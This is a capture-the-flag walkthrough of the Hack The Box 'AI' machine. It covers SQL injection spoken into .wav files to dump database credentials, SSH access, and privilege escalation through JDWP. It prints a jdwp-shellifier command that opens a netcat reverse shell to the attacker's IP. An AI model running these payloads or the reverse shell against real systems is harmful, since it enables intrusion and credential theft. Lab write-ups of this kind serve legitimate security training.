The first thing we should do is map the box IP address to the box name .htb in the
Next up we will run a all port NMAP scan
nmap -sC -sV -p- 10.10.10.163. We get results back for 2 ports: 22 SSH open and 80 HTTP open.
Let’s take a look at port 80 and run a gobuster.
We quickly get some promising results. We’ll take a look at ai.php and intelligence.php. It looks like we have some upload functionality for
.wav files. The AI will process the
.wav files into a search query. Looking at the intelligence page, we can get an overview of some commands and their results after processing by the AI. The page also hints to Microsoft and a Male US voice model. After some googling I found a free Text-To-Speech service with a Male US voice model and an extended Speech-To-Text table.
Generating wav files to dump credentials from the MySQL database
The speech-to-text table contains output that strongly hints to SQL injection, like
union, schema, comma, period, -- -. So let’s try to generate a
.wav file and test this.
We generate single-quote.wav which contains “open single quote”, this should result in a single quote after processing by the AI.
open single quote union select yusername from users comment database open single quote union selectpassword from users comment database
To make sure the AI parses our commands correctly we have to play around with the speed, spacing and spelling.
We successfully extract a username and password.
User flag and enumeration
With our credentials, we can SSH into the user and grab the user flag.
For the next part we will do some heavy enumeration. We run the following scripts and go through the output to look for anything of interest:
Looking at the running processes output from linpeas.sh we can see
-agentlib:jdwp is flagged with a 99% PE.
Monitoring pspy64 we see some interesting output regarding
/root/tomcat.sh which seems to be killing and restarting a Tomcat instance which spawns the same process which was flagged by linpeas.
If we take a look at the network connections and listeners with
netstat -auntp we see localhost is listening on ports 8000, 8080, 8005 and 8009. From the previous output we know the Tomcat server is running on port 8000.
Exploiting JDWP to gain a root shell
The Java Debug Wire Protocol (JDWP) enables remote debugging of java applications with the Java Debugger (JDB). Googling for a JDWP exploit will find us a Github Repository with a JDWP exploitation script called jdwp-shellifier.py.
Because the default netcat binary on the box doesn’t support the
-e flag, we will upload our own
/tmp, we will also upload the jdwp-shellifier.py script.
Before we run the script we will set up a listener with
nc -lnvp 444. Now we can run the exploit:
./jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on 'java.lang.String.indexOf' --cmd '/tmp/nc 10.10.14.XXX 444 -e /bin/bash'
We successfully get a connection back and can upgrade our shell using python:
python -c "import pty;pty.spawn('/bin/bash')" export TERM=xterm
Now we can grab the root flag.